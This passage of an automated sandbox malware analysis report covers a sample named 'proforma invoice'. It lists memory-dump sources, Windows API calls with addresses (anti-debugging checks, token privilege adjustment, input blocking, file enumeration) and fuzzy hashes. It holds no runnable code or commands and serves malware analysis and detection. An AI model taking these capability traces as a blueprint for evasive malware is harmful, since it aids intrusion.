                   • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorEventFileInternetLastRead
                  • String ID:
                  • API String ID: 234945975-0
                  • Opcode ID: 653b53e7efa8115d96c000b6772f51d13ea61761cd7b59236b088e5b74358069
                  • Instruction ID: cfff0e00f2ef54ebbfc1b09d1eb39fae21866be3dfd4b0df094cde30bc0d6dd6
                  • Opcode Fuzzy Hash: 653b53e7efa8115d96c000b6772f51d13ea61761cd7b59236b088e5b74358069
                  • Instruction Fuzzy Hash: 8A21C172540305DBD730CFA5C988BABBBFCEB00314F60446EE546E2151EB74ED898B54
                  APIs
                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00B082AA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                   • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: lstrlen
                  • String ID: ($|
                  • API String ID: 1659193697-1631851259
                  • Opcode ID: ece89c24458e9ac861cfe42597a393c1b3d7c7b9b338e3e59577a442d9d1c537
                  • Instruction ID: 105ee55e0de752400932f6f22df6ee6f13aac752844acd5d05f1f56ad03253dc
                  • Opcode Fuzzy Hash: ece89c24458e9ac861cfe42597a393c1b3d7c7b9b338e3e59577a442d9d1c537
                  • Instruction Fuzzy Hash: 08323775A007059FC728CF59C481A6ABBF1FF48710B15C5AEE49ADB3A1EB70EA41CB44
                  APIs
                  • FindFirstFileW.KERNEL32(?,?), ref: 00B15CC1
                  • FindNextFileW.KERNEL32(00000000,?), ref: 00B15D17
                  • FindClose.KERNEL32(?), ref: 00B15D5F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                   • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Find$File$CloseFirstNext
                  • String ID:
                  • API String ID: 3541575487-0
                  • Opcode ID: a8f7400c48de850dd6c7be2737982b9a929f4007c6264f35cc7580624ec65b30
                  • Instruction ID: 13e6c1796433518b073a9bc834e626e499c7a9e9436bca8fb1b42576154eb187
                  • Opcode Fuzzy Hash: a8f7400c48de850dd6c7be2737982b9a929f4007c6264f35cc7580624ec65b30
                  • Instruction Fuzzy Hash: 37517A74604601DFC724DF28D494E9ABBE4FF4A324F5485ADE95A8B3A1CB30ED84CB91
                  APIs
                  • IsDebuggerPresent.KERNEL32 ref: 00AD271A
                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AD2724
                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00AD2731
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                   • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                  • String ID:
                  • API String ID: 3906539128-0
                  • Opcode ID: 96a24f996bc7f5468e8ae30a63e771211c22b323391fd67f8ba817c91b44da45
                  • Instruction ID: 4894874997a0fdd0a11726a14ca612397caa6a68e3b83767bf1f5c21255744d4
                  • Opcode Fuzzy Hash: 96a24f996bc7f5468e8ae30a63e771211c22b323391fd67f8ba817c91b44da45
                  • Instruction Fuzzy Hash: CF31D67590121CABCB21DF64DD88BDDBBB8AF18310F5041EAE81CA7260EB349F818F44
                  APIs
                  • SetErrorMode.KERNEL32(00000001), ref: 00B151DA
                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B15238
                  • SetErrorMode.KERNEL32(00000000), ref: 00B152A1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                   • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorMode$DiskFreeSpace
                  • String ID:
                  • API String ID: 1682464887-0
                  • Opcode ID: 2fe8545d820e712b39501263115ef9524de6010a4867824a9cc0f6c0487571a9
                  • Instruction ID: 8e40239f9f605685a6cf532627f538aaddedec97fba263a988bcf6a65f0b83da
                  • Opcode Fuzzy Hash: 2fe8545d820e712b39501263115ef9524de6010a4867824a9cc0f6c0487571a9
                  • Instruction Fuzzy Hash: 0F315E75A00618DFDB00DF94D884EAEBBF4FF49314F548099E805AB3A2DB31E855CB90
                  APIs
                    • Part of subcall function 00ABFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00AC0668
                    • Part of subcall function 00ABFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00AC0685
                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B0170D
                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B0173A
                  • GetLastError.KERNEL32 ref: 00B0174A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                   • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                  • String ID:
                  • API String ID: 577356006-0
                  • Opcode ID: e3935763c335349e2460598810e1c5ad170fb2559431289b4988df722dad6a0a
                  • Instruction ID: 530f086f7edc64d87d0b71c22aef63f31e40f14405a6cd79c5b2f4a12ebc183e
                  • Opcode Fuzzy Hash: e3935763c335349e2460598810e1c5ad170fb2559431289b4988df722dad6a0a
                  • Instruction Fuzzy Hash: 07119EB2504304AFD718AF58DDC6DAABBFDEB44714B24856EE05657281EB70FC418B24
                  APIs
                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B0D608
                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00B0D645
                  • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B0D650
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                   • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CloseControlCreateDeviceFileHandle
                  • String ID:
                  • API String ID: 33631002-0
                  • Opcode ID: b81a306616d80905d28b9de3971580c0745d76dedb1c49eff5e0c034c1823eab
                  • Instruction ID: 2be3cf4d533abf26f3d1ceffd202dd0c8270e3822ea231d0506079c3c56fabb8
                  • Opcode Fuzzy Hash: b81a306616d80905d28b9de3971580c0745d76dedb1c49eff5e0c034c1823eab
                  • Instruction Fuzzy Hash: 64113C75E05228BFDB108F959C45FAFBFBCEB45B50F108155F904F7290D6704A058BA1
                  APIs
                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B0168C
                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B016A1
                  • FreeSid.ADVAPI32(?), ref: 00B016B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                   • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: AllocateCheckFreeInitializeMembershipToken
                  • String ID:
                  • API String ID: 3429775523-0
                  • Opcode ID: d6584c164b1cbed5792b9aabc556469955ff9567b3809941f901b7667cd82db1
                  • Instruction ID: 1cf6db109a0d0aea3987522bbaa298f0969b03f98ba20ced62f9295ee7eda7a4
                  • Opcode Fuzzy Hash: d6584c164b1cbed5792b9aabc556469955ff9567b3809941f901b7667cd82db1
                  • Instruction Fuzzy Hash: 6EF0F47195030DFBDB00DFE49D89AAEBBBCEB08704F5049A5E501E2181E774AA448B50
                  APIs
                  • GetCurrentProcess.KERNEL32(00AD28E9,?,00AC4CBE,00AD28E9,00B688B8,0000000C,00AC4E15,00AD28E9,00000002,00000000,?,00AD28E9), ref: 00AC4D09
                  • TerminateProcess.KERNEL32(00000000,?,00AC4CBE,00AD28E9,00B688B8,0000000C,00AC4E15,00AD28E9,00000002,00000000,?,00AD28E9), ref: 00AC4D10
                  • ExitProcess.KERNEL32 ref: 00AC4D22
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                   • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process$CurrentExitTerminate
                  • String ID:
                  • API String ID: 1703294689-0
                  • Opcode ID: 1642c343c5e8f1c386ce92e5d0afebaa863319d028bd379b00f53d273f543884
                  • Instruction ID: e9850dca7bf09943b4543370d02be70df7c3c45f1fe902fd89bcf49c075c4bc7
                  • Opcode Fuzzy Hash: 1642c343c5e8f1c386ce92e5d0afebaa863319d028bd379b00f53d273f543884
                  • Instruction Fuzzy Hash: 2AE0B631000548AFCF12BFA4DE1AF993F69EB45791B214418FC06AB222CB35DD52DB88
                  APIs
                  • GetUserNameW.ADVAPI32(?,?), ref: 00AFD28C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                   • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: NameUser
                  • String ID: X64
                  • API String ID: 2645101109-893830106
                  • Opcode ID: f7e6d15a7ca0b64520f722759b43a7fcdd4027e2f2f76f2de29dabd7675f71c9
                  • Instruction ID: f70148f062015951dd541a957f27c0c569963e3cb3a471bf0a3736578b515e6b
                  • Opcode Fuzzy Hash: f7e6d15a7ca0b64520f722759b43a7fcdd4027e2f2f76f2de29dabd7675f71c9
                  • Instruction Fuzzy Hash: F2D0C9B480111DEACB94DB90DC88DDDB77CBB04305F200151F106A2000DB3096488F10
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                   • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                  • Instruction ID: 97fbe2640c45908b6c2dcf7f344587accccfcbd519f866ca847d1e2fba3bab17
                  • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                  • Instruction Fuzzy Hash: 4C020C71E002199BDF14CFA9C980BADBBF1EF48324F25816ED919E7384D731AE418B94
                  APIs
                  • FindFirstFileW.KERNEL32(?,?), ref: 00B16918
                  • FindClose.KERNEL32(00000000), ref: 00B16961
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                   • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Find$CloseFileFirst
                  • String ID:
                  • API String ID: 2295610775-0
                  • Opcode ID: 6d68a6c8d03c2ec97a15aeeaa2b0b54ef3b482a80791057d90b6fd75db832077
                  • Instruction ID: f2c2579ec45dfaff0bc35ec3f531afc25947cb3f1970c0b0e302182c418a5723
                  • Opcode Fuzzy Hash: 6d68a6c8d03c2ec97a15aeeaa2b0b54ef3b482a80791057d90b6fd75db832077
                  • Instruction Fuzzy Hash: 841193316042119FD710DF69D884A1ABBE5FF89328F54C699E4698F2A2CB30EC45CB91
                  APIs
                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00B24891,?,?,00000035,?), ref: 00B137E4
                  • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00B24891,?,?,00000035,?), ref: 00B137F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                   • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorFormatLastMessage
                  • String ID:
                  • API String ID: 3479602957-0
                  • Opcode ID: 1afc5ba809fdc3885cac9b186a7a272b236f43114ebf8954f184c87d7563e351
                  • Instruction ID: d689ae150393fbea821ae4ac040ab034115c86138ecdf7a565bb2a31b84be960
                  • Opcode Fuzzy Hash: 1afc5ba809fdc3885cac9b186a7a272b236f43114ebf8954f184c87d7563e351
                  • Instruction Fuzzy Hash: 04F0A0B16042282AE72027A68D49FEB3AAEEF85B61F000175B509E32C1DA609D4487B1
                  APIs
                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00B0B25D
                  • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00B0B270
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                   • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: InputSendkeybd_event
                  • String ID:
                  • API String ID: 3536248340-0
                  • Opcode ID: e896179e57b67fd87225983cc2632e5b28ded55df5ed3c5db04bcc94c1885c29
                  • Instruction ID: fcb10bcb7c60e240f6ab8c3e2d108fe24756976ca04397e1a57447000f59bf53
                  • Opcode Fuzzy Hash: e896179e57b67fd87225983cc2632e5b28ded55df5ed3c5db04bcc94c1885c29
                  • Instruction Fuzzy Hash: 03F0177180428EABDB059FA0C806BAE7FB4FF08309F10804AF965A61A2C77986119F94
                  APIs
                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B011FC), ref: 00B010D4
                  • CloseHandle.KERNEL32(?,?,00B011FC), ref: 00B010E9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                   • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: AdjustCloseHandlePrivilegesToken
                  • String ID:
                  • API String ID: 81990902-0
                  • Opcode ID: d36954a637f52226b82fff8f674233b376ca8c8ff6290242366b815373486b09
                  • Instruction ID: 3b90e3b907561630e951299e25bda765a834127c15f53cc79ab7a473dc7b46e1
                  • Opcode Fuzzy Hash: d36954a637f52226b82fff8f674233b376ca8c8ff6290242366b815373486b09
                  • Instruction Fuzzy Hash: 42E0BF72014610AEE7252B55FD05EB77BEDEB04310B24882DF5A6914B1DB62ACA0DB54
                  Strings
                  • Variable is not of type 'Object'., xrefs: 00AF0C40
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                   • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID: Variable is not of type 'Object'.
                  • API String ID: 0-1840281001
                  • Opcode ID: 899c02beef7ed873833730b44396ba043d6b928b8a0bb17c2edf46227828463e
                  • Instruction ID: f38e47a72dbde2f2bf285030c87c474d4a73c0b1765a355ae8785c4dc8e50769
                  • Opcode Fuzzy Hash: 899c02beef7ed873833730b44396ba043d6b928b8a0bb17c2edf46227828463e
                  • Instruction Fuzzy Hash: EE327A70900218DFEF14DF94C985EFDB7B5BF06324F148069E906AB292DB75AE46CB60
                  APIs
                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00AD6766,?,?,00000008,?,?,00ADFEFE,00000000), ref: 00AD6998
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                   • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ExceptionRaise
                  • String ID:
                  • API String ID: 3997070919-0
                  • Opcode ID: b0bd1e54d2e403f2a6a8669942e1ac91b47d9fa12aead09639baf1b389947677
                  • Instruction ID: 0aed528b5213d842346f212ceba7c245a8b4df843c77308b55a39fa384f21c82
                  • Opcode Fuzzy Hash: b0bd1e54d2e403f2a6a8669942e1ac91b47d9fa12aead09639baf1b389947677
                  • Instruction Fuzzy Hash: 17B129316106099FD715CF28C48AB697BB0FF45364F29865AE8DACF3A2C735E991CB40
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                   • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID: 0-3916222277
                  • Opcode ID: c3bf79ff41f3b4ca8ef7ec5f09283dfc4a10a0523a3a396755799034ac8a855f
                  • Instruction ID: d8e2d599b95d74817103b0048616e3944647852b8aadf08cbf42194dd773e1a4
                  • Opcode Fuzzy Hash: c3bf79ff41f3b4ca8ef7ec5f09283dfc4a10a0523a3a396755799034ac8a855f
                  • Instruction Fuzzy Hash: 561251759102299FCB14CF98C8806FEB7F5FF48710F14819AE949EB256DB749E81CBA0
                  APIs
                  • BlockInput.USER32(00000001), ref: 00B1EABD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                   • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: BlockInput
                  • String ID:
                  • API String ID: 3456056419-0
                  • Opcode ID: 2ae5324069f7a68d6bfc54776e0a58100bd9d05cec60c12a809bf2c7d570e214
                  • Instruction ID: c9f304aecbc53b01249350fb6f01c32488d1837486d07ea01fbe0cd6926616d9
                  • Opcode Fuzzy Hash: 2ae5324069f7a68d6bfc54776e0a58100bd9d05cec60c12a809bf2c7d570e214
                  • Instruction Fuzzy Hash: 0EE04F322102049FD710EF69D945E9AFBE9EF99770F008456FC4AD7391DB70E8808BA1
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00AC03EE), ref: 00AC09DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: 7f47eed4f86214b17010b2722a270a8484b0cf114c6054f91d77442311777efd
                  • Instruction ID: 2467ba74e956f7be3c5dcd0eecef91dac22e5fe32f01aebf6ebefd277a7adab4
                  • Opcode Fuzzy Hash: 7f47eed4f86214b17010b2722a270a8484b0cf114c6054f91d77442311777efd
                  • Instruction Fuzzy Hash:
